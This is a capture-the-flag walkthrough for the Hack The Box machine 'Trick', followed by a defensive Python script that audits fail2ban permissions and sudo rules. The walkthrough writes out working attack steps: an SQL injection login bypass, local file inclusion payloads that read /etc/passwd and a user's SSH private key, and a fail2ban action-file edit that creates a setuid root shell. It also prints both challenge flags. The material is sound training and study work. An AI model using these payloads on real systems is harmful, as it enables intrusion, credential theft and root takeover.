Trick
Platform: Hack The Box
IP Address: 10.10.11.166
Difficulty: Easy

Trick is an Easy Linux machine that demonstrates a variety of enumeration and privilege escalation techniques. The target hosts multiple virtual hosts and a DNS service that must be queried to resolve subdomains. A shell is gained through SQL injection and local file inclusion. Root is obtained by exploiting a fail2ban misconfiguration: group-writable action configuration files combined with a sudo rule that allows the service to be restarted.
Port scan:
nmap -p- trick.htb --min-rate 10000
nmap -p 22,25,53,80 trick.htb -sCV -oN nmapscan

DNS zone transfer against the DNS service on port 53:
dig AXFR trick.htb @10.10.11.166
Revealed subdomain: preprod-payroll.trick.htb
SMTP user enumeration with VRFY:
telnet trick.htb 25
VRFY root
VRFY admin
SQL injection authentication bypass on http://preprod-payroll.trick.htb/login.php:
Username: admin' OR 1=1 LIMIT 1;-- -
Login successful.
Virtual host fuzzing:
ffuf -w /usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-110000.txt -u http://trick.htb -H "Host: preprod-FUZZ.trick.htb" -fs 5480
Discovered: preprod-marketing.trick.htb
Local file inclusion in the page parameter:
ffuf -w dirTraversal-nix.txt -u http://preprod-marketing.trick.htb/index.php?page=FUZZ -fs 0
Found traversal:
http://preprod-marketing.trick.htb/index.php?page=....//....//....//etc/passwd
Confirmed user michael from /etc/passwd.
Retrieved michael's SSH private key:
http://preprod-marketing.trick.htb/index.php?page=..././..././..././home/michael/.ssh/id_rsa
SSH access as michael:
chmod 600 id_rsa
ssh -i id_rsa michael@trick.htb
User flag: dbb4962a2e4eb8f22f428a1e84d54526
Privilege escalation:
sudo -l
(root) NOPASSWD: /etc/init.d/fail2ban restart
fail2ban config: /etc/fail2ban/action.d is group-writable, and michael is a member of that group.
Modified action file:
actionban = cp /bin/bash /tmp; chmod +s /tmp/bash
actionunban = chmod +s /tmp/bash
Trigger a ban with brute force or crafted traffic, then:
/tmp/bash -p
cat /root/root.txt
Root flag: 3d0fb710908d01e7f224684957fe1512
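The root path above needs two things at once: a fail2ban configuration tree that a non-root user can modify, and a sudo rule that lets that user restart the service. The following audit script is an added example, not part of the writeup; it checks both conditions on a host (the /etc/fail2ban path and the sudo -l output format are those shown above, and the assess() helper name is my own):

```python
"""Audit for the fail2ban weakness shown in this writeup: a group- or
world-writable file or directory under /etc/fail2ban combined with a
NOPASSWD sudo rule that restarts fail2ban. Added example, not from the
writeup. Run as: sudo -l | python3 fail2ban_audit.py"""
import os
import re
import stat
import sys

WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH
# Matches one rule line of `sudo -l` output, e.g. "(root) NOPASSWD: /etc/init.d/fail2ban restart"
SUDO_RULE = re.compile(r"\(\s*(?P<runas>[^)]+)\)\s*(?P<tags>(?:\w+:\s*)*)(?P<cmd>.+)")


def writable_config_files(root="/etc/fail2ban"):
    """Return (relative path, octal mode) for every directory or file under
    root that is group- or world-writable. A writable action.d directory is
    enough on its own: existing action files can be replaced, not just edited."""
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        # the empty name checks the directory itself, so action.d is covered
        for name in [""] + filenames:
            path = os.path.join(dirpath, name) if name else dirpath
            mode = os.lstat(path).st_mode
            if mode & WRITE_BITS:
                findings.append((os.path.relpath(path, root), oct(stat.S_IMODE(mode))))
    return sorted(findings)


def fail2ban_restart_rules(sudo_l_output):
    """Parse `sudo -l` output and return (runas, command) for every NOPASSWD
    rule whose command refers to fail2ban."""
    rules = []
    for line in sudo_l_output.splitlines():
        m = SUDO_RULE.match(line.strip())
        if m and "NOPASSWD" in m.group("tags") and "fail2ban" in m.group("cmd"):
            rules.append((m.group("runas").strip(), m.group("cmd").strip()))
    return rules


def assess(root="/etc/fail2ban", sudo_l_output=""):
    """The escalation path exists only when both findings are present."""
    writable = writable_config_files(root)
    rules = fail2ban_restart_rules(sudo_l_output)
    return {"writable": writable, "restart_rules": rules,
            "escalation_path": bool(writable and rules)}


if __name__ == "__main__":
    print(assess(sudo_l_output=sys.stdin.read()))
```

Every entry in "writable" should be fixed to mode 0644 (files) or 0755 (directories) owned by root; the sudo rule alone is harmless once the configuration is no longer writable.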
Root access obtained through the fail2ban configuration.

Writeup by inksec
GitHub: https://github.com/inkedqt